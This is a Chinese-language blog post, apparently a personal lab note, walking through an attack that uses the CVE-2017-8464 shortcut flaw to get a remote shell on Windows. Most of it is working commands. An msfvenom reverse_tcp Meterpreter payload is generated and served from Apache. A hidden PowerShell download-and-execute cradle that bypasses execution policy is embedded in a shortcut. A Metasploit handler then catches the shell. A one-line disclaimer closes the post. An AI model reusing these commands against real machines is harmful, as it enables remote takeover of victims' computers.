工具使用手册

CVE-2017-8464漏洞复现

2017-09-29  本文已影响0人  _String_

该漏洞以存在一段时间,由于能力问题一直未对该漏洞利用方式进行测试,今天学过程中记录一下测试流程。

  1. 确认系统是否存在该漏洞
  2. 使用msfvenom 生成反弹shell,shell生成方式如下:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.203.1 LPORT=5555 -f psh-reflection >test.ps1


生成反弹shell
确认生成文件
  1. 将生成文件放到apache网站根目录

sudo cp test.ps1 /var/www/html/


复制完成
  1. 启用apache服务

sudo service apache2 start
启动服务后通过curl方式测试是否正常访问

服务启动
  1. 在靶机上启用powershell链接

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://.../sonar.ps1');xx.ps1" 保存为exe文件。

新建快捷方式 保存
  1. 在攻击端监听反弹
    metasploit做以下相关配置:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ...
msf exploit(handler) > set LPORT ****
msf exploit(handler) > run

启动监听
  1. 在被攻击端运行创建快捷键
  2. msf获取到远程shell
反弹成功 执行系统命令

仅作自己测试,请勿违规使用。

上一篇下一篇

猜你喜欢

热点阅读